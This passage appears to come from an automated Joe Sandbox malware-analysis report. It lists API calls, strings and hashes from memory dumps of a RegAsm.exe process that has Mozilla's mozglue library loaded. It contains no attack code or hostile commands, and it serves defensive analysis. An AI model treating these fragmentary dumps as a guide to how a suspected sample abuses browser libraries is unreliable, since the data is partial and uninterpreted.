                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy$_invalid_parameter_noinfo_noreturnfreestrncmp
                                                                            • String ID: pid:
                                                                            • API String ID: 1916652239-3403741246
                                                                            • Opcode ID: 4c6f748d4c17a2816693ced801d03e63141d72772215ce4a619297c767d6a450
                                                                            • Instruction ID: 047abfd99efe7e5473bd4df71819a6d3811a8b05c3c5aa6068343f58295eaf49
                                                                            • Opcode Fuzzy Hash: 4c6f748d4c17a2816693ced801d03e63141d72772215ce4a619297c767d6a450
                                                                            • Instruction Fuzzy Hash: 8B41E671B002159BCB24CFB8DC8099FBBB9EF85224B144639E865D7781EB309908CBB5
                                                                            APIs
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC81D0F
                                                                            • AcquireSRWLockExclusive.KERNEL32(?,?,6CC81BE3,?,?,6CC81D96,00000000), ref: 6CC81D18
                                                                            • ReleaseSRWLockExclusive.KERNEL32(?,?,6CC81BE3,?,?,6CC81D96,00000000), ref: 6CC81D4C
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC81DB7
                                                                            • AcquireSRWLockExclusive.KERNEL32(?), ref: 6CC81DC0
                                                                            • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CC81DDA
                                                                              • Part of subcall function 6CC81EF0: GetCurrentThreadId.KERNEL32 ref: 6CC81F03
                                                                              • Part of subcall function 6CC81EF0: AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,6CC81DF2,00000000,00000000), ref: 6CC81F0C
                                                                              • Part of subcall function 6CC81EF0: ReleaseSRWLockExclusive.KERNEL32 ref: 6CC81F20
                                                                            • moz_xmalloc.MOZGLUE(00000008,00000000,00000000), ref: 6CC81DF4
                                                                              • Part of subcall function 6CC4CA10: malloc.MOZGLUE(?), ref: 6CC4CA26
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: ExclusiveLock$AcquireCurrentReleaseThread$mallocmoz_xmalloc
                                                                            • String ID:
                                                                            • API String ID: 1880959753-0
                                                                            • Opcode ID: ebcb6e301a00faaf143ae2bbd784498adb6af81b87cf87779cd58181d6bcb967
                                                                            • Instruction ID: cb0a82b2f0db93b956465db9ded3e4cc19976113097c018a5294d4f85013352e
                                                                            • Opcode Fuzzy Hash: ebcb6e301a00faaf143ae2bbd784498adb6af81b87cf87779cd58181d6bcb967
                                                                            • Instruction Fuzzy Hash: 0B4164B52017009FCB10CF69C498B5ABBF9FB89318F10446EE9AA87B41DB71F854CB94
                                                                            APIs
                                                                            • AcquireSRWLockExclusive.KERNEL32(6CCBE220,?), ref: 6CC9BC2D
                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CCBE220), ref: 6CC9BC42
                                                                            • RtlFreeHeap.NTDLL(?,00000000,6CCAE300), ref: 6CC9BC82
                                                                            • RtlFreeUnicodeString.NTDLL(6CCBE210), ref: 6CC9BC91
                                                                            • RtlFreeUnicodeString.NTDLL(6CCBE208), ref: 6CC9BCA3
                                                                            • RtlFreeHeap.NTDLL(?,00000000,6CCBE21C), ref: 6CC9BCD2
                                                                            • free.MOZGLUE(?), ref: 6CC9BCD8
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Free$ExclusiveHeapLockStringUnicode$AcquireReleasefree
                                                                            • String ID:
                                                                            • API String ID: 3047341122-0
                                                                            • Opcode ID: 7cf9629259b70dbcf1d497044db4d001dcbd192c0838a8db690cee31d3d834c8
                                                                            • Instruction ID: 4d0bf74949fda242cdcebb9f957febb3c08e6ad0da31121213caa23ffa412deb
                                                                            • Opcode Fuzzy Hash: 7cf9629259b70dbcf1d497044db4d001dcbd192c0838a8db690cee31d3d834c8
                                                                            • Instruction Fuzzy Hash: 1121FF72A00705AFE3208F46C880B66B7B8FF41718F148469E91A9BA10EB35F846CBD1
                                                                            APIs
                                                                            • AcquireSRWLockExclusive.KERNEL32(6CCBE220,?,?,?,?,6CC43899,?), ref: 6CC438B2
                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CCBE220,?,?,?,6CC43899,?), ref: 6CC438C3
                                                                            • free.MOZGLUE(00000000,?,?,?,6CC43899,?), ref: 6CC438F1
                                                                            • RtlFreeHeap.NTDLL(?,00000000,?), ref: 6CC43920
                                                                            • RtlFreeUnicodeString.NTDLL(-0000000C,?,?,?,6CC43899,?), ref: 6CC4392F
                                                                            • RtlFreeUnicodeString.NTDLL(-00000014,?,?,?,6CC43899,?), ref: 6CC43943
                                                                            • RtlFreeHeap.NTDLL(?,00000000,0000002C), ref: 6CC4396E
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Free$ExclusiveHeapLockStringUnicode$AcquireReleasefree
                                                                            • String ID:
                                                                            • API String ID: 3047341122-0
                                                                            • Opcode ID: 7cbc156125db256caabd5373d54ac80fb1d1d4e85ea225023b3518bd97a626a4
                                                                            • Instruction ID: effeb415e0b3bdc624c5972bd2ad697245cf154774d3e70c63b45919c07aac4e
                                                                            • Opcode Fuzzy Hash: 7cbc156125db256caabd5373d54ac80fb1d1d4e85ea225023b3518bd97a626a4
                                                                            • Instruction Fuzzy Hash: F221F172600614DFD720DF65C884B86B7B9EF85328F19C429E95A97B10E735F846CB90
                                                                            APIs
                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CC784F3
                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CC7850A
                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CC7851E
                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CC7855B
                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CC7856F
                                                                            • ??1UniqueJSONStrings@baseprofiler@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CC785AC
                                                                              • Part of subcall function 6CC77670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6CC785B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CC7767F
                                                                              • Part of subcall function 6CC77670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6CC785B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CC77693
                                                                              • Part of subcall function 6CC77670: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6CC785B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CC776A7
                                                                            • free.MOZGLUE(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CC785B2
                                                                              • Part of subcall function 6CC55E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6CC55EDB
                                                                              • Part of subcall function 6CC55E90: memset.VCRUNTIME140(6CC97765,000000E5,55CCCCCC), ref: 6CC55F27
                                                                              • Part of subcall function 6CC55E90: LeaveCriticalSection.KERNEL32(?), ref: 6CC55FB2
                                                                            Similarity
                                                                            • API ID: free$CriticalSection$EnterLeaveStrings@baseprofiler@mozilla@@Uniquememset
                                                                            • String ID:
                                                                            • API String ID: 2666944752-0
                                                                            • Opcode ID: e605cb9b147a7111abbd5410d7fcf34cc84e72795510a9a93720eb420cfbb820
                                                                            • Instruction ID: 4d10ac50577aada7d362b61e3a0208b1fa88210924dcbc24274bf3900a8d925e
                                                                            • Opcode Fuzzy Hash: e605cb9b147a7111abbd5410d7fcf34cc84e72795510a9a93720eb420cfbb820
                                                                            • Instruction Fuzzy Hash: 03218D742006018FEB24DB64D888E5AB7B5FF4430CF14482DE65B93B41EB35F959CB65
                                                                            APIs
                                                                            • memset.VCRUNTIME140(?,00000000,00000114), ref: 6CC41699
                                                                            • VerSetConditionMask.NTDLL ref: 6CC416CB
                                                                            • VerSetConditionMask.NTDLL ref: 6CC416D7
                                                                            • VerSetConditionMask.NTDLL ref: 6CC416DE
                                                                            • VerSetConditionMask.NTDLL ref: 6CC416E5
                                                                            • VerSetConditionMask.NTDLL ref: 6CC416EC
                                                                            • VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6CC416F9
                                                                            Similarity
                                                                            • API ID: ConditionMask$InfoVerifyVersionmemset
                                                                            • String ID:
                                                                            • API String ID: 375572348-0
                                                                            • Opcode ID: e24f57c6cc0dcdbc0680845e64a71ef5d9877aeed16889d08876a397a2388276
                                                                            • Instruction ID: 2925a08fddee8f5a54bbaee1171f1445e7a55aefe934bad04d5e26a7ccde79d0
                                                                            • Opcode Fuzzy Hash: e24f57c6cc0dcdbc0680845e64a71ef5d9877aeed16889d08876a397a2388276
                                                                            • Instruction Fuzzy Hash: 8A21D5B07402086FEB115BA8CC85FFB737CEF86704F008568F6459B280D678DD5486A1
                                                                            APIs
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC8D1EC
                                                                            • AcquireSRWLockExclusive.KERNEL32(?), ref: 6CC8D1F5
                                                                              • Part of subcall function 6CC8AD40: moz_malloc_usable_size.MOZGLUE(?), ref: 6CC8AE20
                                                                            • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CC8D211
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC8D217
                                                                            • AcquireSRWLockExclusive.KERNEL32(?), ref: 6CC8D226
                                                                            • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CC8D279
                                                                            • free.MOZGLUE(?), ref: 6CC8D2B2
                                                                            Similarity
                                                                            • API ID: ExclusiveLock$AcquireCurrentReleaseThread$freemoz_malloc_usable_size
                                                                            • String ID:
                                                                            • API String ID: 3049780610-0
                                                                            • Opcode ID: 76f9d468145eefffe3a8ea2ea4ac992c6c9340ddfca5001b599fad8b3393750a
                                                                            • Instruction ID: 9018763d0e57128db53b5253077ad3a31de6d0816aa7121a2af032e18bf65e10
                                                                            • Opcode Fuzzy Hash: 76f9d468145eefffe3a8ea2ea4ac992c6c9340ddfca5001b599fad8b3393750a
                                                                            • Instruction Fuzzy Hash: 3C218B717047059FCB04DF64C498A9EBBB1FF8A328F10462EF51A87340EB34A809CB96
                                                                            APIs
                                                                              • Part of subcall function 6CC6CBE8: GetCurrentProcess.KERNEL32(?,6CC331A7), ref: 6CC6CBF1
                                                                              • Part of subcall function 6CC6CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CC331A7), ref: 6CC6CBFA
                                                                              • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CC44A68), ref: 6CC7945E
                                                                              • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CC79470
                                                                              • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CC79482
                                                                              • Part of subcall function 6CC79420: __Init_thread_footer.LIBCMT ref: 6CC7949F
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7F619
                                                                            • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6CC7F598), ref: 6CC7F621
                                                                              • Part of subcall function 6CC794D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CC794EE
                                                                              • Part of subcall function 6CC794D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CC79508
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7F637
                                                                            • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8,?,?,00000000,?,6CC7F598), ref: 6CC7F645
                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8,?,?,00000000,?,6CC7F598), ref: 6CC7F663
                                                                            Strings
                                                                            • [D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6CC7F62A
                                                                            Similarity
                                                                            • API ID: Currentgetenv$ExclusiveLockProcessThread$AcquireInit_thread_footerReleaseTerminate__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                            • String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
                                                                            • API String ID: 1579816589-753366533
                                                                            • Opcode ID: c714ea776e7f8b3f81ded6a531ee0fa0fb2d99447b1f5984636899f167b7c6da
                                                                            • Instruction ID: 4778df622c67525bb7c54f3533e28710fa10add5ef69b097b7c5efe91115fbe4
                                                                            • Opcode Fuzzy Hash: c714ea776e7f8b3f81ded6a531ee0fa0fb2d99447b1f5984636899f167b7c6da
                                                                            • Instruction Fuzzy Hash: 7311A379201205AFCB54AFA9C9989A5B779FF86758B100016FA0587F01EB71EC21CBB4
                                                                            APIs
                                                                              • Part of subcall function 6CC6AB89: EnterCriticalSection.KERNEL32(6CCBE370,?,?,?,6CC334DE,6CCBF6CC,?,?,?,?,?,?,?,6CC33284), ref: 6CC6AB94
                                                                              • Part of subcall function 6CC6AB89: LeaveCriticalSection.KERNEL32(6CCBE370,?,6CC334DE,6CCBF6CC,?,?,?,?,?,?,?,6CC33284,?,?,6CC556F6), ref: 6CC6ABD1
                                                                            • LoadLibraryW.KERNEL32(combase.dll,6CC41C5F), ref: 6CC420AE
                                                                            • GetProcAddress.KERNEL32(00000000,CoInitializeSecurity), ref: 6CC420CD
                                                                            • __Init_thread_footer.LIBCMT ref: 6CC420E1
                                                                            • FreeLibrary.KERNEL32 ref: 6CC42124
                                                                            Similarity
                                                                            • API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
                                                                            • String ID: CoInitializeSecurity$combase.dll
                                                                            • API String ID: 4190559335-2476802802
                                                                            • Opcode ID: 2e1e177a3e7b781c2ed851fa9a27d512037c1acfad0a9bfa6c3213e98608d4e1
                                                                            • Instruction ID: cdf4e73a16d7355498c12083d25a2eb043f2d541ade559201004c174f854c738
                                                                            • Opcode Fuzzy Hash: 2e1e177a3e7b781c2ed851fa9a27d512037c1acfad0a9bfa6c3213e98608d4e1
                                                                            • Instruction Fuzzy Hash: 3A216A7A200209EFDF118F99DD99D9A3BB6FB4A325F008018FA0592710E7719866DF65
                                                                            APIs
                                                                              • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CC44A68), ref: 6CC7945E
                                                                              • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CC79470
                                                                              • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CC79482
                                                                              • Part of subcall function 6CC79420: __Init_thread_footer.LIBCMT ref: 6CC7949F
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC799C1
                                                                            • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC799CE
                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC799F8
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC79A05
                                                                            • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC79A0D
                                                                              • Part of subcall function 6CC79A60: GetCurrentThreadId.KERNEL32 ref: 6CC79A95
                                                                              • Part of subcall function 6CC79A60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC79A9D
                                                                              • Part of subcall function 6CC79A60: ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6CC79ACC
                                                                              • Part of subcall function 6CC79A60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CC79BA7
                                                                              • Part of subcall function 6CC79A60: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6CC79BB8
                                                                              • Part of subcall function 6CC79A60: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6CC79BC9
                                                                              • Part of subcall function 6CC6CBE8: GetCurrentProcess.KERNEL32(?,6CC331A7), ref: 6CC6CBF1
                                                                              • Part of subcall function 6CC6CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CC331A7), ref: 6CC6CBFA
                                                                            Strings
                                                                            • [I %d/%d] profiler_stream_json_for_this_process, xrefs: 6CC79A15
                                                                            Similarity
                                                                            • API ID: Current$ThreadTimegetenv$ExclusiveLockProcessStampV01@@Value@mozilla@@_getpid$?profiler_time@baseprofiler@mozilla@@AcquireInit_thread_footerNow@ReleaseStamp@mozilla@@TerminateV12@_
                                                                            • String ID: [I %d/%d] profiler_stream_json_for_this_process
                                                                            • API String ID: 2359002670-141131661
                                                                            • Opcode ID: f0a2efc5007bff6f59406b315dfd2d7b5150e79bce8d081302d1d07dbed33054
                                                                            • Instruction ID: f143143c30bd3b6349c7f2ce372984f59e0cb16a361a2c7dfb744bef3f6f2111
                                                                            • Opcode Fuzzy Hash: f0a2efc5007bff6f59406b315dfd2d7b5150e79bce8d081302d1d07dbed33054
                                                                            • Instruction Fuzzy Hash: B201263EA041249FDF205FE994586A97B78EF47268F044016FD0553F01F7744C44CABA
                                                                            APIs
                                                                              • Part of subcall function 6CC6AB89: EnterCriticalSection.KERNEL32(6CCBE370,?,?,?,6CC334DE,6CCBF6CC,?,?,?,?,?,?,?,6CC33284), ref: 6CC6AB94
                                                                              • Part of subcall function 6CC6AB89: LeaveCriticalSection.KERNEL32(6CCBE370,?,6CC334DE,6CCBF6CC,?,?,?,?,?,?,?,6CC33284,?,?,6CC556F6), ref: 6CC6ABD1
                                                                            • LoadLibraryW.KERNEL32(combase.dll,?), ref: 6CC41FDE
                                                                            • GetProcAddress.KERNEL32(00000000,CoCreateInstance), ref: 6CC41FFD
                                                                            • __Init_thread_footer.LIBCMT ref: 6CC42011
                                                                            • FreeLibrary.KERNEL32 ref: 6CC42059
                                                                            Similarity
                                                                            • API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
                                                                            • String ID: CoCreateInstance$combase.dll
                                                                            • API String ID: 4190559335-2197658831
                                                                            • Opcode ID: 97dc4c378ef58d7301fb0ca69b3c3e1fc0db59724173afac8a544d8d37624cfa
                                                                            • Instruction ID: 7bb09187a104818e4711fcb221c36e0437221380d3f725931d81ba8d7a227d7c
                                                                            • Opcode Fuzzy Hash: 97dc4c378ef58d7301fb0ca69b3c3e1fc0db59724173afac8a544d8d37624cfa
                                                                            • Instruction Fuzzy Hash: 75117C7C201204AFDF20CF95CAA9E967BB9EF8635AF008029F905D3750E731A805DB65
                                                                            APIs
                                                                              • Part of subcall function 6CC6AB89: EnterCriticalSection.KERNEL32(6CCBE370,?,?,?,6CC334DE,6CCBF6CC,?,?,?,?,?,?,?,6CC33284), ref: 6CC6AB94
                                                                              • Part of subcall function 6CC6AB89: LeaveCriticalSection.KERNEL32(6CCBE370,?,6CC334DE,6CCBF6CC,?,?,?,?,?,?,?,6CC33284,?,?,6CC556F6), ref: 6CC6ABD1
                                                                            • LoadLibraryW.KERNEL32(combase.dll,00000000,?,6CC6D9F0,00000000), ref: 6CC40F1D
                                                                            • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 6CC40F3C
                                                                            • __Init_thread_footer.LIBCMT ref: 6CC40F50
                                                                            • FreeLibrary.KERNEL32(?,6CC6D9F0,00000000), ref: 6CC40F86
                                                                            Similarity
                                                                            • API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
                                                                            • String ID: CoInitializeEx$combase.dll
                                                                            • API String ID: 4190559335-2063391169
                                                                            • Opcode ID: e49932e3503dd845d8caf27f69aa5285c6ad079242e534b5142fae23961b475e
                                                                            • Instruction ID: 95b6fa3e6f6fb75e1b225d5c36bb87106c8efdef1d3c7919324f75b502647d18
                                                                            • Opcode Fuzzy Hash: e49932e3503dd845d8caf27f69aa5285c6ad079242e534b5142fae23961b475e
                                                                            • Instruction Fuzzy Hash: A611527D7452819FEF00DFE9CA58A863774FB9A326F008629ED0592B41F770A409CA69
                                                                            APIs
                                                                              • Part of subcall function 6CC6AB89: EnterCriticalSection.KERNEL32(6CCBE370,?,?,?,6CC334DE,6CCBF6CC,?,?,?,?,?,?,?,6CC33284), ref: 6CC6AB94
                                                                              • Part of subcall function 6CC6AB89: LeaveCriticalSection.KERNEL32(6CCBE370,?,6CC334DE,6CCBF6CC,?,?,?,?,?,?,?,6CC33284,?,?,6CC556F6), ref: 6CC6ABD1
                                                                            • LoadLibraryW.KERNEL32(combase.dll), ref: 6CC4631B
                                                                            • GetProcAddress.KERNEL32(00000000,CoUninitialize), ref: 6CC4633A
                                                                            • __Init_thread_footer.LIBCMT ref: 6CC4634E
                                                                            • FreeLibrary.KERNEL32 ref: 6CC46376
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
                                                                            • String ID: CoUninitialize$combase.dll
                                                                            • API String ID: 4190559335-3846590027
                                                                            • Opcode ID: b355a912c6e30fb287d0eeb86985f1ec966f07de25c4097b7c8b6b6f698508e8
                                                                            • Instruction ID: ea3d8e588e53b9d69e2b5e427e367405ce1dfe0cae8fcb14f3b29f9c0e353a69
                                                                            • Opcode Fuzzy Hash: b355a912c6e30fb287d0eeb86985f1ec966f07de25c4097b7c8b6b6f698508e8
                                                                            • Instruction Fuzzy Hash: 94015EBC705645CFDB00CFE9D698B1673B1BB06319F008129E902D2B90F7B0A409CE59
                                                                            APIs
                                                                              • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CC44A68), ref: 6CC7945E
                                                                              • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CC79470
                                                                              • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CC79482
                                                                              • Part of subcall function 6CC79420: __Init_thread_footer.LIBCMT ref: 6CC7949F
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7F559
                                                                            • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC7F561
                                                                              • Part of subcall function 6CC794D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CC794EE
                                                                              • Part of subcall function 6CC794D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CC79508
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7F577
                                                                            • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7F585
                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7F5A3
                                                                            Strings
                                                                            • [D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6CC7F56A
                                                                            • [I %d/%d] profiler_resume_sampling, xrefs: 6CC7F499
                                                                            • [I %d/%d] profiler_pause_sampling, xrefs: 6CC7F3A8
                                                                            • [I %d/%d] profiler_resume, xrefs: 6CC7F239
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                            • String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
                                                                            • API String ID: 2848912005-2840072211
                                                                            • Opcode ID: 3c5ecaf3caea1818e5c270962211a228a004e3df296c17d6cd52f1c317ed55bb
                                                                            • Instruction ID: 59aec5b42fcf22e7c4658734fbb2c6a3f8a71c18cde73d1b74f3551bc0d374ee
                                                                            • Opcode Fuzzy Hash: 3c5ecaf3caea1818e5c270962211a228a004e3df296c17d6cd52f1c317ed55bb
                                                                            • Instruction Fuzzy Hash: 16F0547D7002049FDE106BE9D89895AB77DEB8629DF000055FA0593B11EB759C058B79
                                                                            APIs
                                                                            • LoadLibraryW.KERNEL32(kernel32.dll,6CC40DF8), ref: 6CC40E82
                                                                            • GetProcAddress.KERNEL32(00000000,GetProcessMitigationPolicy), ref: 6CC40EA1
                                                                            • __Init_thread_footer.LIBCMT ref: 6CC40EB5
                                                                            • FreeLibrary.KERNEL32 ref: 6CC40EC5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Library$AddressFreeInit_thread_footerLoadProc
                                                                            • String ID: GetProcessMitigationPolicy$kernel32.dll
                                                                            • API String ID: 391052410-1680159014
                                                                            • Opcode ID: 850acedd25b99a68be3521b7cb5894c940a760b2dc5794777933eb43c6611ce2
                                                                            • Instruction ID: 397ae4df68db93a2b021eb2f472b8f9483f39ca12a48b097a7c036618861d6f6
